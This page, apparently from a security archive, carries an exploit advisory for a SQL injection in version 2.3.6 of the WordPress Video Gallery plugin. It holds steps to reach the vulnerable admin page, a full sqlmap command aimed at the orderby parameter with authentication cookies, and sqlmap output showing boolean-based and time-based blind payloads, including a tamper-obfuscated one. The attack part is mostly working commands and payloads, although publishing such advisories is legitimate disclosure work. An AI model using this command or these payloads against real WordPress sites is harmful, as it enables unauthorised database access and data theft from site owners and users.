Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- WordPress Video Gallery - YouTube Gallery And Vimeo Gallery 2.3.6 SQL Injection[6]
- Authored by tmrswrr[7] | Site github.com[8]
-
WordPress Video Gallery - YouTube Gallery And Vimeo Gallery version 2.3.6 suffers from a remote SQL injection vulnerability.
- SHA-256 |
012d59f6bf2194035050256720e3f27a15d7b84f7333ba8a2b7de8ed79331ec5
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Exploit Title: Wordpress Video Gallery - YouTube Gallery and Vimeo Gallery Plugin SQL Injection
# Date: 2024-07-05
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-video-gallery/
# Version 2.3.6
1. **Access the Admin Panel:**
- Navigate to the admin panel of your WordPress site.
- Go to `TS Video Gallery > `Create ` > ` Use Theme` and save it.
```
2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc
3. Search for orderby parameter.
## SQLMAP COMMAND
python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc" --batch --dbms=mysql --thread 10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 -p orderby --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \
wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \
wordpress_test_cookie=WP Cookie check; \
wp-settings-time-1=1720173805" --thread 10
## RESULT
sqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:37:45] [INFO] the back-end DBMS is MySQL
[08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End))
web application technology: Apache 2.4.54, PHP 8.0.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
File Tags
- ActiveX[19] (933)
- Advisory[20] (85,849)
- Arbitrary[21] (16,793)
- BBS[22] (2,859)
- Bypass[23] (1,847)
- CGI[24] (1,033)
- Code Execution[25] (7,738)
- Conference[26] (691)
- Cracker[27] (844)
- CSRF[28] (3,378)
- DoS[29] (24,927)
- Encryption[30] (2,389)
- Exploit[31] (53,011)
- File Inclusion[32] (4,256)
- File Upload[33] (989)
- Firewall[34] (822)
- Info Disclosure[35] (2,874)
- Intrusion Detection[36] (913)
- Java[37] (3,134)
- JavaScript[38] (895)
- Kernel[39] (7,130)
- Local[40] (14,757)
- Magazine[41] (586)
- Overflow[42] (13,133)
- Perl[43] (1,434)
- PHP[44] (5,219)
- Proof of Concept[45] (2,375)
- Protocol[46] (3,720)
- Python[47] (1,628)
- Remote[48] (31,575)
- Root[49] (3,623)
- Rootkit[50] (524)
- Ruby[51] (629)
- Scanner[52] (1,656)
- Security Tool[53] (8,016)
- Shell[54] (3,270)
- Shellcode[55] (1,217)
- Sniffer[56] (901)
- Spoof[57] (2,269)
- SQL Injection[58] (16,576)
- TCP[59] (2,439)
- Trojan[60] (690)
- UDP[61] (901)
- Virus[62] (669)
- Vulnerability[63] (32,862)
- Web[64] (9,935)
- Whitepaper[65] (3,780)
- x86[66] (967)
- XSS[67] (18,229)
- Other[68]
File Archives
- July 2024[69]
- June 2024[70]
- May 2024[71]
- April 2024[72]
- March 2024[73]
- February 2024[74]
- January 2024[75]
- December 2023[76]
- November 2023[77]
- October 2023[78]
- September 2023[79]
- August 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,090)
- BSD[84] (376)
- CentOS[85] (58)
- Cisco[86] (1,927)
- Debian[87] (7,074)
- Fedora[88] (1,693)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,523)
- HPUX[91] (880)
- iOS[92] (376)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (50,242)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (489)
- RedHat[101] (16,193)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,636)
- UNIX[106] (9,424)
- UnixWare[107] (187)
- Windows[108] (6,665)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]